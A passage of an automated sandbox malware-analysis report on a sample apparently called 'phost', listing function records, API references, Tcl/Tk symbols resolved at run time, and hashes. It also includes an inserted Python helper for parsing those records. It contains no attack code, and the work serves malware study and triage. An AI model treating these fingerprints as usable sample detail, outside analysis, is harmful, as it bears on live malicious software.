                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8E0CD60F0C60392FF16DBFA9C6553A11706FD8BB0F044234C81DC22A2EE3C6895C312
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF62CC8AA45,?,?,00000000,00007FF62CC8AAFA), ref: 00007FF62CC8AC36
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62CC8AA45,?,?,00000000,00007FF62CC8AAFA), ref: 00007FF62CC8AC40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction ID: 71713c5413e71548ff9e783cc55ef8f4c1438063c4e8d6133f2a6256f75af0f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A219321F1C64242FEA657699C9067B12B29F84BF4F484339EA2EC77C5CE6CE4458302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction ID: ef09d287a09e8cd73fc19644dbf20ae15d5b4352a4f4c756acca0183ea213856
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0541B132B0960187EE359A1DED50A7B73B4EB55BE4F105231DA8EC7691CF2DE402CB52
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
                                                                                                                                                                                                                              • Instruction ID: 0039720059a151118b1f507c689274f688197bc56855f4e79e3fe9b4d6c86197
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8334f334696440ef64ed4453da584d980c1c0ded1461c6629ef7e16216bca0a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C21D321B0C65285FE119B2A6D087BA9665FF45BE8F8C4430EF0D9B786DE3DE046D702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
• Instruction ID: 97f1d0c4fecc28903f4903597c344abfd029484504783e5bb07065959d23f5a6
• Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
• Instruction Fuzzy Hash: 7F317E31B1864285EB539B598C61BBE2670AF40BF4F420339E96D933D2DF7CA4818722
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction ID: 397e3f1ae1e6ffb949a3a46553bfcaf4141d650b8b21ac4da724afef2049a6b1
• Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction Fuzzy Hash: 23217F32B057828EEF6A9F68C848AEE33B0EB44768F444635D62D86AD5DF3CD584C741
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction ID: 5288570d1ffbc8e2ef83e37d5cf275736ad5d9772271ffb1c41ff4d437e66771
• Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction Fuzzy Hash: 75119632B1C64181FE629F599C0197FA2B1AF45BE0F444231EB4CD7A96DFBDD4008702
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
• Instruction ID: 546a1a177f04ca54416a5c650dd3ac28fe9a4316dc461935a5df6a72e6a73d96
• Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
• Instruction Fuzzy Hash: EB215072718A8286DFA19F1CD85077A76B0FB84BA8F548234E69DC76D9DF3CD4008B01
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: b3f33d435726a7e6b37db82cf8507c0968e1e1daa5d36e65d9fb8158fd0a91c2
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction Fuzzy Hash: 6C018E22B4874141EE06DB5A9D0186AA6A1BF86FF0F488731EE5C97BD6CE3CE0018341
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF62CC80D00,?,?,?,00007FF62CC8236A,?,?,?,?,?,00007FF62CC83B59), ref: 00007FF62CC8D6AA
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction ID: b3bd5f2276f108c7148e443b174a34106403ac9e25767aa87aac732a18a42dfd
• Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction Fuzzy Hash: 42F0FE10F0934B95FE6667A95C51A7A12B06F547F0F094B30DD2EC53DADE2CF4808612
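The function records in this part of the report are worth skimming mechanically rather than by eye: most are CRT stubs with an empty String ID, and the one that matters is the GetProcAddress loader stub whose String ID carries the names of the Tcl/Tk symbols the sample resolves at run time (the AddressErrorLastProc record that follows this one). The helper below is an added example, not part of the Joe Sandbox report or of its tooling. It parses the bullet-style records exactly as they appear here, pulls the referenced API calls and the run-time-resolved symbol names out of them, checks that Opcode ID and Opcode Fuzzy Hash agree in every record, and relates the .sdmp file name to the PE image base. The sample input is copied from two records on this page (the last fuzzy hash of the second record is beyond this page and is left out); reading the fourth dot-separated field of the .sdmp name as the region's start address is an assumption that happens to fit the values here (image base + 0x1000).

```python
"""Triage helper for Joe Sandbox IDA-plugin function records (added example)."""
import re

# Constructed sample: two records copied from this report, verbatim apart from trimming.
SAMPLE = """\
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF62CC80D00,?,?,?,00007FF62CC8236A,?,?,?,?,?,00007FF62CC83B59), ref: 00007FF62CC8D6AA
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction ID: b3bd5f2276f108c7148e443b174a34106403ac9e25767aa87aac732a18a42dfd
• Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction Fuzzy Hash: 42F0FE10F0934B95FE6667A95C51A7A12B06F547F0F094B30DD2EC53DADE2CF4808612
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
• Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
• Instruction ID: 4736c4785d45458d7ecd6ca510b826146a83199af77a7766b131d2ddab09aa15
• Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
RECORD_START = "APIs"  # every record in the report opens with its APIs section
FIELD_RE = re.compile(r"^• (?P<key>[^:]+?):\s*(?P<value>.*)$")
API_CALL_RE = re.compile(r"^• (?P<api>[\w.]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")


def parse_records(text):
    """Split the report text into records: {'api_calls': [(api, ref)], 'fields': {key: value}}."""
    records, section, rec = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == RECORD_START:
                rec = {"api_calls": [], "fields": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("• "):
            continue
        if section == "APIs":
            m = API_CALL_RE.match(line)
            if m:
                rec["api_calls"].append((m.group("api"), m.group("ref")))
            continue
        m = FIELD_RE.match(line)
        if m:
            rec["fields"][m.group("key")] = m.group("value")
    return records


def resolved_symbols(record):
    """Plain identifiers in the '$'-joined String ID field, i.e. names the stub looks up
    by string (format strings such as 'Failed to get address for %hs' are dropped)."""
    return [s for s in record["fields"].get("String ID", "").split("$") if IDENT_RE.match(s)]


def opcode_id_matches_fuzzy(record):
    f = record["fields"]
    return f.get("Opcode ID") == f.get("Opcode Fuzzy Hash")


def dump_start_rva(record):
    """Distance from the PE image base (Offset) to the dumped region's start, taking the
    4th dot-separated field of the .sdmp name as that start address (assumption)."""
    name, _, rest = record["fields"]["Source File"].partition(", ")
    start = int(name.split(".")[3], 16)
    base = int(re.search(r"Offset: ([0-9A-Fa-f]+)", rest).group(1), 16)
    return start - base


def index_by_api_id(records):
    by_api = {}
    for r in records:
        by_api.setdefault(r["fields"].get("API ID", ""), []).append(r)
    return by_api


if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r["fields"]["API ID"], r["api_calls"], len(resolved_symbols(r)), hex(dump_start_rva(r)))
```

On the two records above this yields one direct HeapAlloc call referenced at 00007FF62CC8D6AA, no resolved names for the AllocHeap stub, and 34 names for the loader stub (GetProcAddress itself plus 31 Tcl_ and 2 Tk_ entry points), which is the list to carry into the rest of the triage. Every dump in these records starts 0x1000 past the image base, i.e. at the first section rather than the headers.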
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
Strings
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
• API String ID: 0-2665694366
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
• _get_daylight.LIBCMT ref: 00007FF62CC95CB5
  • Part of subcall function 00007FF62CC95608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9561C
  • Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
  • Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
  • Part of subcall function 00007FF62CC8A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62CC8A94F,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8A979
  • Part of subcall function 00007FF62CC8A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF62CC8A94F,?,?,?,?,?,00007FF62CC8A83A), ref: 00007FF62CC8A99E
• _get_daylight.LIBCMT ref: 00007FF62CC95CA4
  • Part of subcall function 00007FF62CC95668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC9567C
• _get_daylight.LIBCMT ref: 00007FF62CC95F1A
• _get_daylight.LIBCMT ref: 00007FF62CC95F2B
• _get_daylight.LIBCMT ref: 00007FF62CC95F3C
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62CC9617C), ref: 00007FF62CC95F63
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
• Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction ID: cf4ca272f6a914803da853a19940e15fae5bc9d9ed0e1b6bf7f070c433a74314
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98315132718F8196EB608F29EC506AE73B4FB84768F544135EA8D87B54DF3CC1458B01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
